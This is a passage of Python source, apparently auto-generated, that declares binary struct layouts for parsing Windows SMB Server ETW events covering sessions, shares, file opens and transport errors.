"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=122, version=2)
class Microsoft_Windows_SMBServer_122_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=200, version=0)
class Microsoft_Windows_SMBServer_200_0(Etw):
pattern = Struct(
"ComponentId" / Int32ul,
"LineNumber" / Int32ul,
"FunctionNameLength" / Int16ul,
"FunctionName" / Bytes(lambda this: this.FunctionNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=201, version=0)
class Microsoft_Windows_SMBServer_201_0(Etw):
pattern = Struct(
"WorkItem" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=202, version=0)
class Microsoft_Windows_SMBServer_202_0(Etw):
pattern = Struct(
"WorkItem" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=500, version=0)
class Microsoft_Windows_SMBServer_500_0(Etw):
pattern = Struct(
"ConnectionGUID" / Guid,
"AddressLength" / Int32ul,
"Address" / Bytes(lambda this: this.AddressLength),
"TransportLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=501, version=0)
class Microsoft_Windows_SMBServer_501_0(Etw):
pattern = Struct(
"ConnectionGUID" / Guid,
"Flags" / Int32ul,
"AddressLength" / Int32ul,
"Address" / Bytes(lambda this: this.AddressLength),
"TransportLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=502, version=0)
class Microsoft_Windows_SMBServer_502_0(Etw):
pattern = Struct(
"ConnectionGUID" / Guid,
"Reason" / Int32ul,
"Status" / Int32ul,
"AddressLength" / Int32ul,
"Address" / Bytes(lambda this: this.AddressLength),
"TransportLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=550, version=0)
class Microsoft_Windows_SMBServer_550_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=551, version=0)
class Microsoft_Windows_SMBServer_551_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=551, version=1)
class Microsoft_Windows_SMBServer_551_1(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionId" / Int64ul,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=551, version=2)
class Microsoft_Windows_SMBServer_551_2(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionId" / Int64ul,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"SPN" / WString,
"SPNValidationPolicy" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=552, version=0)
class Microsoft_Windows_SMBServer_552_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=553, version=0)
class Microsoft_Windows_SMBServer_553_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"BindingSessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=554, version=0)
class Microsoft_Windows_SMBServer_554_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=555, version=0)
class Microsoft_Windows_SMBServer_555_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"InvalidateSession" / Int8ul,
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=600, version=0)
class Microsoft_Windows_SMBServer_600_0(Etw):
pattern = Struct(
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"ShareGUID" / Guid,
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ScopeNameLength" / Int16ul,
"ScopeName" / Bytes(lambda this: this.ScopeNameLength),
"ShareProperties" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=601, version=0)
class Microsoft_Windows_SMBServer_601_0(Etw):
pattern = Struct(
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=602, version=0)
class Microsoft_Windows_SMBServer_602_0(Etw):
pattern = Struct(
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=603, version=0)
class Microsoft_Windows_SMBServer_603_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ScopeNameLength" / Int16ul,
"ScopeName" / Bytes(lambda this: this.ScopeNameLength),
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=650, version=0)
class Microsoft_Windows_SMBServer_650_0(Etw):
pattern = Struct(
"OpenGUID" / Guid,
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"ShareGUID" / Guid,
"NameLength" / Int16ul,
"Name" / Bytes(lambda this: this.NameLength),
"LeaseId" / Guid,
"DesiredAccess" / Int32ul,
"SharingMode" / Int32ul,
"CreateOptions" / Int32ul,
"FileAttributes" / Int32ul,
"IsReplay" / Int8ul,
"IsResume" / Int8ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=651, version=0)
class Microsoft_Windows_SMBServer_651_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=652, version=0)
class Microsoft_Windows_SMBServer_652_0(Etw):
pattern = Struct(
"OpenGUID" / Guid,
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=653, version=0)
class Microsoft_Windows_SMBServer_653_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=654, version=0)
class Microsoft_Windows_SMBServer_654_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=655, version=0)
class Microsoft_Windows_SMBServer_655_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=656, version=0)
class Microsoft_Windows_SMBServer_656_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=657, version=0)
class Microsoft_Windows_SMBServer_657_0(Etw):
pattern = Struct(
"OpenGUID" / Guid,
"AppInstanceGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=658, version=0)
class Microsoft_Windows_SMBServer_658_0(Etw):
pattern = Struct(
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ComputerNameLength" / Int16ul,
"ComputerName" / Bytes(lambda this: this.ComputerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=700, version=0)
class Microsoft_Windows_SMBServer_700_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"PathNameLength" / Int16ul,
"PathName" / Bytes(lambda this: this.PathNameLength),
"CSCState" / Int32ul,
"ClusterShareType" / Int32ul,
"ShareProperties" / Int32ul,
"CaTimeOut" / Int32ul,
"ShareState" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=701, version=0)
class Microsoft_Windows_SMBServer_701_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"PathNameLength" / Int16ul,
"PathName" / Bytes(lambda this: this.PathNameLength),
"CSCState" / Int32ul,
"ClusterShareType" / Int32ul,
"ShareProperties" / Int32ul,
"CaTimeOut" / Int32ul,
"ShareState" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=702, version=0)
class Microsoft_Windows_SMBServer_702_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1000, version=0)
class Microsoft_Windows_SMBServer_1000_0(Etw):
pattern = Struct(
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength),
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1001, version=0)
class Microsoft_Windows_SMBServer_1001_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"LogEventCount" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1002, version=0)
class Microsoft_Windows_SMBServer_1002_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1003, version=0)
class Microsoft_Windows_SMBServer_1003_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1003, version=1)
class Microsoft_Windows_SMBServer_1003_1(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1004, version=0)
class Microsoft_Windows_SMBServer_1004_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1004, version=1)
class Microsoft_Windows_SMBServer_1004_1(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1005, version=0)
class Microsoft_Windows_SMBServer_1005_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1005, version=1)
class Microsoft_Windows_SMBServer_1005_1(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ExpectedDialect" / Int32ul,
"ExpectedCapabilities" / Int32ul,
"ExpectedSecurityMode" / Int32ul,
"ReceivedDialect" / Int32ul,
"ReceivedCapabilities" / Int32ul,
"ReceivedSecurityMode" / Int32ul,
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1005, version=2)
class Microsoft_Windows_SMBServer_1005_2(Etw):
pattern = Struct(
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1006, version=0)
class Microsoft_Windows_SMBServer_1006_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"SharePathLength" / Int16ul,
"SharePath" / Bytes(lambda this: this.SharePathLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"MappedAccess" / Int32ul,
"GrantedAccess" / Int32ul,
"ShareSecurityDescriptorLength" / Int32ul,
"ShareSecurityDescriptor" / Bytes(lambda this: this.ShareSecurityDescriptorLength),
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1007, version=0)
class Microsoft_Windows_SMBServer_1007_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"SharePathLength" / Int16ul,
"SharePath" / Bytes(lambda this: this.SharePathLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1009, version=0)
class Microsoft_Windows_SMBServer_1009_0(Etw):
pattern = Struct(
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"SessionId" / Int64ul,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1010, version=0)
class Microsoft_Windows_SMBServer_1010_0(Etw):
pattern = Struct(
"NameLength" / Int16ul,
"Name" / Bytes(lambda this: this.NameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength),
"TransportFlags" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1011, version=0)
class Microsoft_Windows_SMBServer_1011_0(Etw):
pattern = Struct(
"NameLength" / Int16ul,
"Name" / Bytes(lambda this: this.NameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1012, version=0)
class Microsoft_Windows_SMBServer_1012_0(Etw):
pattern = Struct(
"ChangeType" / Int32ul,
"NetNameLength" / Int16ul,
"NetName" / Bytes(lambda this: this.NetNameLength),
"Flags" / Int32ul,
"InterfaceIndex" / Int32ul,
"Capability" / Int32ul,
"LinkSpeed" / Int64ul,
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1013, version=0)
class Microsoft_Windows_SMBServer_1013_0(Etw):
pattern = Struct(
"EndpointNameLength" / Int16ul,
"EndpointName" / Bytes(lambda this: this.EndpointNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1014, version=0)
class Microsoft_Windows_SMBServer_1014_0(Etw):
pattern = Struct(
"EndpointNameLength" / Int16ul,
"EndpointName" / Bytes(lambda this: this.EndpointNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1015, version=0)
class Microsoft_Windows_SMBServer_1015_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1016, version=0)
class Microsoft_Windows_SMBServer_1016_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"RKFStatus" / Int32ul,
"TranslatedRKFStatus" / Int32ul,
"ConnectionGUID" / Guid,
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"SessionId" / Int64ul,
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"DurableHandle" / Int8ul,
"ResilientHandle" / Int8ul,
"PersistentHandle" / Int8ul,
"ResumeKey" / Guid,
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1017, version=0)
class Microsoft_Windows_SMBServer_1017_0(Etw):
pattern = Struct(
"DurableHandle" / Int8ul,
"ResilientHandle" / Int8ul,
"PersistentFID" / Int64ul,
"VolatileFID" / Int64ul,
"ResumeKey" / Guid,
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1018, version=0)
class Microsoft_Windows_SMBServer_1018_0(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"TaskStatus" / Int32ul,
"TranslatedTaskStatus" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1019, version=0)
class Microsoft_Windows_SMBServer_1019_0(Etw):
pattern = Struct(
"ResumeKey" / Guid,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"TaskStatus" / Int32ul,
"TranslatedTaskStatus" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1020, version=0)
class Microsoft_Windows_SMBServer_1020_0(Etw):
pattern = Struct(
"Command" / Int32ul,
"SessionGuid" / Guid,
"SessionId" / Int64ul,
"ConnectionGuid" / Guid,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"DurationInMilliseconds" / Int64ul,
"ThresholdInMilliseconds" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1020, version=1)
class Microsoft_Windows_SMBServer_1020_1(Etw):
pattern = Struct(
"Command" / Int32ul,
"SessionGuid" / Guid,
"SessionId" / Int64ul,
"ConnectionGuid" / Guid,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"DurationInMilliseconds" / Int64ul,
"ThresholdInMilliseconds" / Int64ul,
"CtlCode" / Int32ul,
"SubCode" / Int32ul,
"TunneledControl" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1021, version=0)
class Microsoft_Windows_SMBServer_1021_0(Etw):
pattern = Struct(
"ConfiguredLmCompatibilityLevel" / Int32ul,
"DefaultLmCompatibilityLevel" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1028, version=0)
class Microsoft_Windows_SMBServer_1028_0(Etw):
pattern = Struct(
"NewDialect" / Int16ul,
"OldDialect" / Int16ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1029, version=0)
class Microsoft_Windows_SMBServer_1029_0(Etw):
pattern = Struct(
"CipherSuiteOrder" / WString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1030, version=0)
class Microsoft_Windows_SMBServer_1030_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"IsRead" / Int8ul,
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1031, version=0)
class Microsoft_Windows_SMBServer_1031_0(Etw):
pattern = Struct(
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1032, version=0)
class Microsoft_Windows_SMBServer_1032_0(Etw):
pattern = Struct(
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1033, version=0)
class Microsoft_Windows_SMBServer_1033_0(Etw):
pattern = Struct(
"NotificationType" / Int32ul,
"InterfaceNameLength" / Int16ul,
"InterfaceName" / Bytes(lambda this: this.InterfaceNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1034, version=0)
class Microsoft_Windows_SMBServer_1034_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"InterfaceIndex" / Int32ul,
"Error" / Int32ul,
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength),
"ExtraInformation" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1035, version=0)
class Microsoft_Windows_SMBServer_1035_0(Etw):
pattern = Struct(
"EndpointState" / Int32ul,
"InterfaceIndex" / Int32ul,
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1036, version=0)
class Microsoft_Windows_SMBServer_1036_0(Etw):
pattern = Struct(
"InterfaceIndex" / Int32ul,
"Error" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1037, version=0)
class Microsoft_Windows_SMBServer_1037_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"InterfaceIndex" / Int32ul,
"Error" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1038, version=0)
class Microsoft_Windows_SMBServer_1038_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength),
"Error" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1039, version=0)
class Microsoft_Windows_SMBServer_1039_0(Etw):
pattern = Struct(
"NotificationType" / Int32ul,
"InterfaceIndex" / Int32ul,
"NdkOperationalState" / Int16ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1040, version=0)
class Microsoft_Windows_SMBServer_1040_0(Etw):
pattern = Struct(
"NotificationType" / Int32ul,
"InterfaceIndex" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1041, version=0)
class Microsoft_Windows_SMBServer_1041_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"RegistryValueNameLength" / Int32ul,
"RegistryValueName" / Bytes(lambda this: this.RegistryValueNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1043, version=0)
class Microsoft_Windows_SMBServer_1043_0(Etw):
pattern = Struct(
"CloseOperationDurationInMillieconds" / Int64ul,
"TransportNameLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength),
"EndpointShutdown" / Int8ul,
"EndpointRemoved" / Int8ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1800, version=0)
class Microsoft_Windows_SMBServer_1800_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1801, version=0)
class Microsoft_Windows_SMBServer_1801_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
